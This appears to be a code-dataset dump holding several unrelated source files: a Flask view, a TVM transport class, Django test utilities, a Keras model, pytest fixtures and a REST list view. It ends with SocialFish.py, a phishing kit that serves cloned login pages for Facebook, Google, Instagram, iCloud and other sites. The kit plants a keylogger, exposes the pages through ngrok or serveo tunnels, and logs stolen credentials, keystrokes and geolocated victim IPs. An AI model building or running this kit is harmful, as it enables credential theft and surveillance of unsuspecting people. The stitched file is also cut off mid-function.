hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7f46b24b1fad22d6f5db57d3217da27c6a184bdb | 1,120 | py | Python | cwlab/web_app/main.py | krini-project/CWLab | 7e75cf9c4d00a9defb03802b358d40902f1ffd59 | [
"Apache-2.0"
] | null | null | null | cwlab/web_app/main.py | krini-project/CWLab | 7e75cf9c4d00a9defb03802b358d40902f1ffd59 | [
"Apache-2.0"
] | null | null | null | cwlab/web_app/main.py | krini-project/CWLab | 7e75cf9c4d00a9defb03802b358d40902f1ffd59 | [
"Apache-2.0"
] | null | null | null | import sys
import os
from flask import render_template, jsonify, redirect, flash, url_for, request
from flask_login import current_user
from werkzeug.urls import url_parse
from flask import current_app as app
from cwlab.users.manage import load_user
from json import dumps
from cwlab.log import handle_known_error, handle_unknown_error
@app.route('/', methods=['GET','POST'])
@app.route('/home/', methods=['GET','POST'])
@app.route('/main/', methods=['GET','POST'])
def main():
if app.config["ENABLE_USERS"] and current_user.is_authenticated:
logged_in = True
user = load_user(current_user.get_id())
username = user.username
user_level = user.level
else:
logged_in = False
username = None
user_level = None
return render_template(
'main.html',
login_enabled = app.config["ENABLE_USERS"],
logged_in = logged_in,
username = username,
user_level = user_level,
auto_refresh_interval = app.config["WEB_AUTO_REFRESH_INTERVAL"],
read_max_chars_from_file = app.config["READ_MAX_CHARS_FROM_FILE"]
) | 33.939394 | 77 | 0.69375 |
418f8bdbb27ab3c7b68e89ad042008afe47432d3 | 2,929 | py | Python | python/tvm/micro/transport/wakeup.py | zhenlohuang/tvm | fd2e6d17120a79533852c6bb705429d9c7bc286b | [
"Apache-2.0"
] | 90 | 2019-01-26T00:38:49.000Z | 2022-03-11T23:12:34.000Z | python/tvm/micro/transport/wakeup.py | zhenlohuang/tvm | fd2e6d17120a79533852c6bb705429d9c7bc286b | [
"Apache-2.0"
] | 91 | 2019-02-27T00:17:01.000Z | 2022-02-21T18:08:21.000Z | python/tvm/micro/transport/wakeup.py | zhenlohuang/tvm | fd2e6d17120a79533852c6bb705429d9c7bc286b | [
"Apache-2.0"
] | 41 | 2019-01-28T14:37:03.000Z | 2022-03-31T03:58:57.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Defines an implementation of Transport that uses subprocesses."""
import logging
import time
from . import base
_LOG = logging.getLogger(__name__)
class WakeupTransport(base.Transport):
"""A Transport implementation that waits for a "wakeup sequence" from the remote end."""
def __init__(self, child_transport, wakeup_sequence):
self.child_transport = child_transport
self.wakeup_sequence = bytes(wakeup_sequence)
self.wakeup_sequence_buffer = bytearray()
self.line_start_index = 0
self.found_wakeup_sequence = False
def open(self):
return self.child_transport.open()
def close(self):
return self.child_transport.close()
def timeouts(self):
return self.child_transport.timeouts()
def _await_wakeup(self, end_time):
def _time_remaining():
if end_time is None:
return None
return max(0, end_time - time.monotonic())
if not self.found_wakeup_sequence:
while self.wakeup_sequence not in self.wakeup_sequence_buffer:
x = self.child_transport.read(1, _time_remaining())
self.wakeup_sequence_buffer.extend(x)
if x[0] in (b"\n", b"\xff"):
_LOG.debug("%s", self.wakeup_sequence_buffer[self.line_start_index : -1])
self.line_start_index = len(self.wakeup_sequence_buffer)
_LOG.info("remote side woke up!")
self.found_wakeup_sequence = True
time.sleep(0.2)
return _time_remaining()
def read(self, n, timeout_sec):
if not self.found_wakeup_sequence:
end_time = None if timeout_sec is None else time.monotonic() + timeout_sec
timeout_sec = self._await_wakeup(end_time)
return self.child_transport.read(n, timeout_sec)
def write(self, data, timeout_sec):
if not self.found_wakeup_sequence:
end_time = None if timeout_sec is None else time.monotonic() + timeout_sec
timeout_sec = self._await_wakeup(end_time)
return self.child_transport.write(data, timeout_sec)
| 36.6125 | 93 | 0.686241 |
9a0fe5a454948769e1a11d721d1c1fa1ed4a35cd | 2,920 | py | Python | django/utils/unittest/util.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 3 | 2016-07-08T23:49:32.000Z | 2018-04-15T22:55:01.000Z | django/utils/unittest/util.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 27 | 2017-02-05T15:57:04.000Z | 2018-04-15T22:57:26.000Z | django/utils/unittest/util.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | null | null | null | """Various utility functions."""
__unittest = True
_MAX_LENGTH = 80
def safe_repr(obj, short=False):
try:
result = repr(obj)
except Exception:
result = object.__repr__(obj)
if not short or len(result) < _MAX_LENGTH:
return result
return result[:_MAX_LENGTH] + ' [truncated]...'
def safe_str(obj):
try:
return str(obj)
except Exception:
return object.__str__(obj)
def strclass(cls):
return "%s.%s" % (cls.__module__, cls.__name__)
def sorted_list_difference(expected, actual):
"""Finds elements in only one or the other of two, sorted input lists.
Returns a two-element tuple of lists. The first list contains those
elements in the "expected" list but not in the "actual" list, and the
second contains those elements in the "actual" list but not in the
"expected" list. Duplicate elements in either input list are ignored.
"""
i = j = 0
missing = []
unexpected = []
while True:
try:
e = expected[i]
a = actual[j]
if e < a:
missing.append(e)
i += 1
while expected[i] == e:
i += 1
elif e > a:
unexpected.append(a)
j += 1
while actual[j] == a:
j += 1
else:
i += 1
try:
while expected[i] == e:
i += 1
finally:
j += 1
while actual[j] == a:
j += 1
except IndexError:
missing.extend(expected[i:])
unexpected.extend(actual[j:])
break
return missing, unexpected
def unorderable_list_difference(expected, actual, ignore_duplicate=False):
"""Same behavior as sorted_list_difference but
for lists of unorderable items (like dicts).
As it does a linear search per item (remove) it
has O(n*n) performance.
"""
missing = []
unexpected = []
while expected:
item = expected.pop()
try:
actual.remove(item)
except ValueError:
missing.append(item)
if ignore_duplicate:
for lst in expected, actual:
try:
while True:
lst.remove(item)
except ValueError:
pass
if ignore_duplicate:
while actual:
item = actual.pop()
unexpected.append(item)
try:
while True:
actual.remove(item)
except ValueError:
pass
return missing, unexpected
# anything left in actual is unexpected
return missing, actual
| 29.2 | 77 | 0.496233 |
f2f1cf347e159cd360c025c1625f867002cddd7d | 3,323 | py | Python | model.py | xmeng17/Behavioral-Cloning | 713e9c539dacc8ea1512c2b1c43fd46b63c8c0b9 | [
"MIT"
] | null | null | null | model.py | xmeng17/Behavioral-Cloning | 713e9c539dacc8ea1512c2b1c43fd46b63c8c0b9 | [
"MIT"
] | null | null | null | model.py | xmeng17/Behavioral-Cloning | 713e9c539dacc8ea1512c2b1c43fd46b63c8c0b9 | [
"MIT"
] | null | null | null | from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout, Lambda, Cropping2D, Convolution2D,MaxPooling2D
from keras.layers.advanced_activations import LeakyReLU
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import cv2
import numpy as np
import csv
path_prefix = 'data/'
data_range = None
verbose = 1
batch_size = 64
epochs = 7
dropout_rate = 0.2
leaky=0.1
def get_train_valid_arr(path):
arr = []
with open(path) as f:
reader = csv.reader(f)
next(reader)
for line in reader:
arr.append(line)
arr = arr[:data_range]
train_arr, valid_arr = train_test_split(arr, test_size=0.2)
return train_arr, valid_arr
def generator(arr):
num = len(arr)
while True:
shuffle(arr)
for i in range(0, num, batch_size):
batch_lines = arr[i:i + batch_size]
images = []
steerings = []
for line in batch_lines:
center_path = line[0]
steering = float(line[3])
center_real_path = path_prefix + center_path
image = cv2.imread(center_real_path)
#image = cv2.imread(center_path)
images.append(image)
steerings.append(steering)
image_flip=np.fliplr(image)
images.append(image_flip)
steerings.append(-steering)
X_train = np.array(images)
y_train = np.array(steerings)
yield shuffle(X_train, y_train)
def model(train_batch_num, valid_batch_num, train_generator, valid_generator):
model = Sequential()
model.add(Cropping2D(cropping=((45, 15), (0, 0)), input_shape=(160, 320, 3)))
model.add(Lambda(lambda x: x / 255.0 - 0.5))
relu1=LeakyReLU(alpha=leaky)
model.add(Convolution2D(16,(5,5),strides=(1,1),padding='valid'))
model.add(relu1)
model.add(Dropout(dropout_rate))
model.add(MaxPooling2D((2,2),strides=(2,2)))
relu2 = LeakyReLU(alpha=leaky)
model.add(Convolution2D(24, (5, 5), strides=(1, 1), padding='valid'))
model.add(relu2)
model.add(Dropout(dropout_rate))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
relu3 = LeakyReLU(alpha=leaky)
model.add(Convolution2D(32, (5, 5), strides=(1, 1), padding='valid'))
model.add(relu3)
model.add(Dropout(dropout_rate))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(Flatten())
model.add(Dense(512,activation='relu'))
model.add(Dropout(dropout_rate))
model.add(Dense(512,activation='relu'))
model.add(Dense(1))
model.compile(optimizer='adam', loss='mse')
model.fit_generator(train_generator, steps_per_epoch=train_batch_num, epochs=epochs, verbose=verbose,
validation_data=valid_generator, validation_steps=valid_batch_num)
model.save('model.h5')
train_arr, valid_arr = get_train_valid_arr(path_prefix + 'driving_log.csv')
train_batch_num = int(len(train_arr) / batch_size)
valid_batch_num = int(len(valid_arr) / batch_size)
train_generator = generator(train_arr)
valid_generator = generator(valid_arr)
model(train_batch_num, valid_batch_num, train_generator, valid_generator)
'''x_train,y_train=next(train_generator)
print(x_train[0])
print(y_train[0])'''
| 32.262136 | 105 | 0.66145 |
80dff869f781884a8f6cb78082605b4b8f9ba588 | 507 | py | Python | mmkitjournal/views.py | einsfr/mmkit2 | 68ff9b28faadf8b57c845601e1fdf01b961f6936 | [
"MIT"
] | null | null | null | mmkitjournal/views.py | einsfr/mmkit2 | 68ff9b28faadf8b57c845601e1fdf01b961f6936 | [
"MIT"
] | 7 | 2016-07-15T13:35:22.000Z | 2016-07-29T09:42:23.000Z | mmkitjournal/views.py | einsfr/mmkit2 | 68ff9b28faadf8b57c845601e1fdf01b961f6936 | [
"MIT"
] | null | null | null | from rest_framework import generics
from rest_framework.filters import DjangoFilterBackend
from mmkitjournal.models import ActivityRecord
from mmkitjournal import serializers
from . import filters
class ActivityRecordView(generics.ListAPIView):
queryset = ActivityRecord.objects.select_related('message_class', 'user', 'content_type').all()
serializer_class = serializers.ActivityRecordListSerializer
filter_backends = (DjangoFilterBackend, )
filter_class = filters.ActivityRecordFilter
| 33.8 | 99 | 0.82643 |
4340002fcbcff9a0ce508542aeca89c861463454 | 2,469 | py | Python | osf_tests/conftest.py | hmoco/osf.io | a02869f9b5c198bafae7cea0c216674bbcba62f7 | [
"Apache-2.0"
] | 1 | 2015-10-02T18:35:53.000Z | 2015-10-02T18:35:53.000Z | osf_tests/conftest.py | hmoco/osf.io | a02869f9b5c198bafae7cea0c216674bbcba62f7 | [
"Apache-2.0"
] | 4 | 2016-05-13T14:24:16.000Z | 2017-03-30T15:28:31.000Z | osf_tests/conftest.py | hmoco/osf.io | a02869f9b5c198bafae7cea0c216674bbcba62f7 | [
"Apache-2.0"
] | null | null | null | import logging
import pytest
from faker import Factory
from framework.django.handlers import handlers as django_handlers
from framework.flask import rm_handlers
from website import settings
from website.app import init_app, patch_models
from website.project.signals import contributor_added
from website.project.views.contributor import notify_added_contributor
# Silence some 3rd-party logging and some "loud" internal loggers
SILENT_LOGGERS = [
'api.caching.tasks',
'factory.generate',
'factory.containers',
'framework.analytics',
'framework.auth.core',
'framework.celery_tasks.signals',
'website.app',
'website.archiver.tasks',
'website.mails',
'website.notifications.listeners',
'website.search.elastic_search',
'website.search_migration.migrate',
'website.util.paths',
'requests_oauthlib.oauth2_session',
'raven.base.Client',
'raven.contrib.django.client.DjangoClient',
]
for logger_name in SILENT_LOGGERS:
logging.getLogger(logger_name).setLevel(logging.CRITICAL)
@pytest.fixture(autouse=True, scope='session')
def patched_models():
patch_models(settings)
# NOTE: autouse so that ADDONS_REQUESTED gets set on website.settings
@pytest.fixture(autouse=True, scope='session')
def app():
try:
test_app = init_app(routes=True, set_backends=False)
except AssertionError: # Routes have already been set up
test_app = init_app(routes=False, set_backends=False)
rm_handlers(test_app, django_handlers)
test_app.testing = True
return test_app
@pytest.yield_fixture()
def request_context(app):
context = app.test_request_context(headers={
'Remote-Addr': '146.9.219.56',
'User-Agent': 'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020518 Netscape6/6.2.3'
})
context.push()
yield context
context.pop()
DISCONNECTED_SIGNALS = {
# disconnect notify_add_contributor so that add_contributor does not send "fake" emails in tests
contributor_added: [notify_added_contributor]
}
@pytest.fixture(autouse=True)
def disconnected_signals():
for signal in DISCONNECTED_SIGNALS:
for receiver in DISCONNECTED_SIGNALS[signal]:
signal.disconnect(receiver)
@pytest.fixture(autouse=True)
def patched_settings():
"""Patch settings for tests"""
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
settings.BCRYPT_LOG_ROUNDS = 1
@pytest.fixture()
def fake():
return Factory.create()
| 29.392857 | 107 | 0.737546 |
400e7f8e473cb6f9c598b19e62a6ecd0fb72978d | 18,651 | py | Python | SocialFish.py | Jena2000/SocialFish | c4ab72c1e12d0c00845620b4808d2145a7f98a87 | [
"BSD-3-Clause"
] | 198 | 2018-03-26T17:34:44.000Z | 2022-02-26T15:18:31.000Z | SocialFish.py | Jena2000/SocialFish | c4ab72c1e12d0c00845620b4808d2145a7f98a87 | [
"BSD-3-Clause"
] | 88 | 2018-03-30T16:42:58.000Z | 2018-10-28T04:42:02.000Z | SocialFish.py | Jena2000/SocialFish | c4ab72c1e12d0c00845620b4808d2145a7f98a87 | [
"BSD-3-Clause"
] | 115 | 2018-04-09T04:30:56.000Z | 2022-03-31T16:26:53.000Z | #!/usr/bin/python3
#-*- coding: utf-8 -*-
# SOCIALFISH v3.0
# by: An0nUD4Y
#
###########################
from time import sleep
from sys import stdout, exit, argv
from os import system, path
from distutils.dir_util import copy_tree
import multiprocessing
from urllib.request import urlopen, quote, unquote
from platform import system as systemos, architecture
from wget import download
import re
import json
from subprocess import check_output
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
def connected(host='http://duckduckgo.com'): #Checking network connection.
try:
urlopen(host)
return True
except:
return False
if connected() == False: #If there no network
print ('''
....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _
/ \/| [__ | | | | |__| | |___ | [__ |__|
\o__ /\| ___] |__| |___ | | | |___ | | ___] | |
\|
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
'''.format(RED, DEFAULT))
exit(0)
def checkNgrok(): #Check if user already have Ngrok server, if False - downloading it.
if path.isfile('Server/ngrok') == False:
print('[*] Downloading Ngrok...')
if 'Android' in str(check_output(('uname', '-a'))):
filename = 'ngrok-stable-linux-arm.zip'
else:
ostype = systemos().lower()
if architecture()[0] == '64bit':
filename = 'ngrok-stable-{0}-amd64.zip'.format(ostype)
else:
filename = 'ngrok-stable-{0}-386.zip'.format(ostype)
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
download(url)
system('unzip ' + filename)
system('mv ngrok Server/ngrok')
system('rm -Rf ' + filename)
system('clear')
checkNgrok()
def end(): #Message when SocialFish exit
system('clear')
print ('''
S O C I A L{2}
|\ \ \ \ \ \ \ \ __ ___
| \ \ \ \ \ \ \ \ | O~-_ _-~~ ~~-_
| >----|-|-|-|-|-|-|--| __/ / {1}DON'T{2} )
| / / / / / / / / |__\ < {1}FORGET{2} )
|/ / / / / / / / \_ {1}ME !{2} _)
{1}F I S H{2} ~--___--~
{0}NOW WITH LIVE VICTIM ATTACK INFORMATION ]
{0}A KEYLOGGER IS DEPLOYED FOR YOU, TO CAPTURE EVERY KEYSTROKE ]
[ {0} Some more phising pages have been added in script. For a better Attack]
[ {0} WELCOME TO SOCIALFISH V3.0 by-An0nUD4Y]\n {1}'''.format(GREEN, DEFAULT, CYAN))
def loadModule(module):
print ('''{0}
_.-=-._ .-,
.' "-.,' /
( AnonUD4Y _. <
`=.____.=" `._\\
[{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, DEFAULT) % module)
def runPhishing(page, option2): #Phishing pages selection menu
system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/')
if option2 == '1' and page == 'Facebook':
copy_tree("WebPages/fb_standard/", "Server/www/")
if option2 == '2' and page == 'Facebook':
copy_tree("WebPages/fb_advanced_poll/", "Server/www/")
if option2 == '3' and page == 'Facebook':
copy_tree("WebPages/fb_security_fake/", "Server/www/")
if option2 == '4' and page == 'Facebook':
copy_tree("WebPages/fb_messenger/", "Server/www/")
elif option2 == '1' and page == 'Google':
copy_tree("WebPages/google_standard/", "Server/www/")
elif option2 == '2' and page == 'Google':
copy_tree("WebPages/google_advanced_poll/", "Server/www/")
elif option2 == '3' and page == 'Google':
copy_tree("WebPages/google_advanced_web/", "Server/www/")
elif page == 'LinkedIn':
copy_tree("WebPages/linkedin/", "Server/www/")
elif page == 'GitHub':
copy_tree("WebPages/GitHub/", "Server/www/")
elif page == 'StackOverflow':
copy_tree("WebPages/stackoverflow/", "Server/www/")
elif page == 'WordPress':
copy_tree("WebPages/wordpress/", "Server/www/")
elif page == 'Twitter':
copy_tree("WebPages/twitter/", "Server/www/")
elif page == 'Snapchat':
copy_tree("WebPages/Snapchat_web/", "Server/www/")
elif page == 'Yahoo':
copy_tree("WebPages/yahoo_web/", "Server/www/")
elif page == 'Twitch':
copy_tree("WebPages/twitch/", "Server/www/")
elif page == 'Microsoft':
copy_tree("WebPages/live_web/", "Server/www/")
elif page == 'Steam':
copy_tree("WebPages/steam/", "Server/www/")
elif page == 'iCloud':
copy_tree("WebPages/iCloud/", "Server/www/")
elif option2 == '1' and page == 'Instagram':
copy_tree("WebPages/Instagram_web/", "Server/www/")
elif option2 == '2' and page == 'Instagram':
copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
elif option2 == '1' and page == 'VK':
copy_tree("WebPages/VK/", "Server/www/")
elif option2 == '2' and page == 'VK':
copy_tree("WebPages/VK_poll_method/", "Server/www/")
didBackground = True
logFile = None
for arg in argv:
if arg=="--nolog": #If true - don't log
didBackground = False
if didBackground:
logFile = open("log.txt", "w")
def log(ctx): #Writing log
if didBackground: #if didBackground == True, write
logFile.write(ctx.replace(RED, "").replace(WHITE, "").replace(CYAN, "").replace(GREEN, "").replace(DEFAULT, "") + "\n")
print(ctx)
def waitCreds():
print("{0}[{1}*{0}]{1} Hi Hacker Everything has been completed.............. Start HAcking ".format(RED, DEFAULT))
print('''{0}
_.-=-._ .-,
.' "-.,' /
( AnonUD4Y_ ~.<
`=.____.=" `._\\
[{1}*{0}]{1} WE HAVE ALSO DEPLOYED A KEYLOGGER. .
[{1}*{0}]{1} YOU WILL GET VICTIM'S DEVICES INFO.{0}'''.format(CYAN, DEFAULT))
print(" {0}[{1}*{0}]{1} Waiting for credentials//Pressed keys//Victim's device info... \n".format(RED, DEFAULT))
while True:
with open('Server/www/usernames.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
log('======================================================================'.format(RED, DEFAULT))
log(' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
log('======================================================================'.format(RED, DEFAULT))
log(' {0}***** HOPE YOU ARE ENJOYING. SO PLEASE MAKE IT MORE POPULAR *****{1}\n {0}{1}'.format(RED, DEFAULT))
creds.close()
with open('Server/www/ip.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
ip = re.match('Victim Public IP: (.*?)\n', lines).group(1)
resp = urlopen('https://ipinfo.io/%s/json' % ip)
ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo:
log('======================================================================'.format(RED, DEFAULT))
log(' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
else:
matchObj = re.match('^(.*?),(.*)$', ipinfo['loc'])
latitude = matchObj.group(1)
longitude = matchObj.group(2)
log('======================================================================'.format(RED, DEFAULT))
log(' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
log(' \n{0}Longitude: %s \nLatitude: %s{1}'.format(GREEN, DEFAULT) % (longitude, latitude))
log(' \n{0}ISP: %s \nCountry: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['org'], ipinfo['country']))
log(' \n{0}Region: %s \nCity: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['region'], ipinfo['city']))
system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt')
log('======================================================================'.format(RED, DEFAULT))
creds.close()
with open('Server/www/KeyloggerData.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
log('______________________________________________________________________'.format(RED, DEFAULT))
log(' {0}[ GETTING PRESSED KEYS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
system('rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt')
log('______________________________________________________________________'.format(RED, DEFAULT))
creds.close()
def runPEnv(): #menu where user select what they wanna use
system('clear')
print (''' {2}-{1} An0nUD4Y {2}|{1} An0nUD4Y {2}|{1} An0nUD4Y {2}- INDIA
. . .
. ' . ' '
' ' ' ' '
███████ ████████ ███████ ██ ███████ ██ ███████ ██ ███████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ██ ██ ██ ██ ███████ ██ █████ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ████████ ███████ ██ ██ ██ ███████ ██ ██ ███████ ██ ██
. ' '....' ..'. ' .
' . . ' ' ' {1}v3.0{2}
' . . . . . '. .' ' .
' ' '. ' {1}Updated_By--> AnonUD4Y_{2}
_________________________________________________________________________________
{0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]
{0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY KEYSTROKE ]
_________________________________________________________________________________
{1}'''.format(GREEN, DEFAULT, CYAN))
for i in range(101):
sleep(0.01)
stdout.write("\r{0}[{1}*{0}]{1} Preparing environment... %d%%".format(CYAN, DEFAULT) % i)
stdout.flush()
print ("\n\n{0}[{1}*{0}]{1} Searching for PHP installation... ".format(CYAN, DEFAULT))
if 256 != system('which php'): #Checking if user have PHP
print (" --{0}>{1} OK.".format(CYAN, DEFAULT))
else:
print (" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again.http://www.php.net/".format(RED, DEFAULT))
exit(0)
if input(" {0}[{1}!{0}]{1} Do you agree to use this tool for educational purposes only? (y/n)\n {2}SF-An0nUD4Y > {1}".format(RED, DEFAULT, CYAN)).upper() != 'Y': #Question where user must accept education purposes
system('clear')
print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, DEFAULT))
exit(0)
option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
if option == '1':
loadModule('Facebook')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
runPhishing('Facebook', option2)
elif option == '2':
loadModule('Google')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
runPhishing('Google', option2)
elif option == '3':
loadModule('LinkedIn')
option2 = ''
runPhishing('LinkedIn', option2)
elif option == '4':
loadModule('GitHub')
option2 = ''
runPhishing('GitHub', option2)
elif option == '5':
loadModule('StackOverflow')
option2 = ''
runPhishing('StackOverflow', option2)
elif option == '6':
loadModule('WordPress')
option2 = ''
runPhishing('WordPress', option2)
elif option == '7':
loadModule('Twitter')
option2 = ''
runPhishing('Twitter', option2)
elif option == '8':
loadModule('Instagram')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
runPhishing('Instagram', option2)
elif option == '9':
loadModule('Snapchat')
option2 = ''
runPhishing('Snapchat', option2)
elif option == '10':
loadModule('Yahoo')
option2 = ''
runPhishing('Yahoo', option2)
elif option == '11':
loadModule('Twitch')
option2 = ''
runPhishing('Twitch', option2)
elif option == '12':
loadModule('Microsoft')
option2 = ''
runPhishing('Microsoft', option2)
elif option == '13':
loadModule('Steam')
option2 = ''
runPhishing('Steam', option2)
elif option == '14':
loadModule('VK')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
runPhishing('VK', option2)
elif option == '15':
loadModule('iCloud')
option2 = ''
runPhishing('iCloud', option2)
else:
exit(0)
def runServeo():
system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > link.url 2> /dev/null &')
sleep(7)
output = check_output("grep -o 'https://[0-9a-z]*\.serveo.net' link.url", shell=True)
url = str(output).strip("b ' \ n")
print("\n {0}[{1}*{0}]{1} SERVEO URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN))
link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN))
print("\n")
def runNgrok():
system('./Server/ngrok http 1111 > /dev/null &')
while True:
sleep(2)
system('curl -s -N http://127.0.0.1:4040/status | grep "https://[0-9a-z]*\.ngrok.io" -oh > ngrok.url')
urlFile = open('ngrok.url', 'r')
url = urlFile.read()
urlFile.close()
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
print("\n {0}[{1}*{0}]{1} Ngrok URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN))
